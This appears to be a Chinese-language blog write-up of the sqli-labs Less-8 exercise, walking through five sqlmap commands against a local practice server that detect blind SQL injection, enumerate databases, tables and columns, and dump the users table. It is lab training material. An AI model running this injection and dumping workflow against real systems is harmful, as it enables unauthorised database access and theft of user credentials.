sqli-labs-Less-8自动化注入方法

sqli-labs 实验记录

Less-8

第一步:进行sqli注入漏洞检测

输入命令:

复制代码
sqlmap -u http://localhost/Less-8/?id=1 --batch

--batch 表示采用默认参数。

查询结果如图所示:存在注入漏洞,注入类型分别为:boolean-based blind, time-based blind,; 并给出了相应的payload。

第二步:查询服务器中的所有数据库

输入命令:

复制代码
sqlmap -u http://localhost/Less-8/?id=1 --batch --dbs

--dbs 表示查询数据库。

查询结果如图所示:数据库共有两个,分别为information_schema, security。

第三步:查询指定数据库中的所有表

输入命令:

复制代码
sqlmap -u http://localhost/Less-8/?id=1 --batch -D security --tables

-D security 表示指定查询数据库security;
--tables 表示查询数据库中的所有表。

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的所有列

输入命令:

复制代码
sqlmap -u http://localhost/Less-8/?id=1 --batch -D security -T users --columns

-T users 表示指定查询数据表users;
--columns 表示查询数据表中的所有列。

查询结果如图所示:数据列共有3个,分别是id, password, username。

第五步:查询指定数据表中的具体信息

输入命令:

复制代码
sqlmap -u http://localhost/Less-8/?id=1 --batch -D security -T users --dump

--dump 表示查询数据表中的具体信息

查询结果如图所示:数据表users中的具体信息共有13条。

相关推荐
jarreyer7 小时前
【AI Agent】大模型自动化载体
运维·自动化
中科岩创8 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
梦帮科技9 小时前
GRAVIS v4.0:基于Web的极速套利架构设计与实时数据流实现
前端·人工智能·rust·自动化·区块链·智能合约·数字货币
万亿少女的梦16810 小时前
基于Python的高考志愿填报辅助系统设计与实现
java·spring boot·python·mysql·vue
万亿少女的梦16810 小时前
基于SpringBoot与Vue的历史博物馆展品展示与游客管理系统设计
spring boot·mysql·vue·系统设计·博物馆管理系统
微信开发api-视频号协议10 小时前
企业微信外部群开发自动化实践过程
java·前端·微信·自动化·企业微信·ipad
曦尧11 小时前
Meetily:隐私优先的本地 AI 会议助手
ai·自动化
灯澜忆梦13 小时前
MySQL 完整学习路线
学习·mysql
ClouGence13 小时前
保障公共安全,一线治安机构实时数据应用与实践
数据库·mysql·postgresql
Minxinbb13 小时前
TDSQL for MySQL 服务器重启操作
数据库·mysql·dba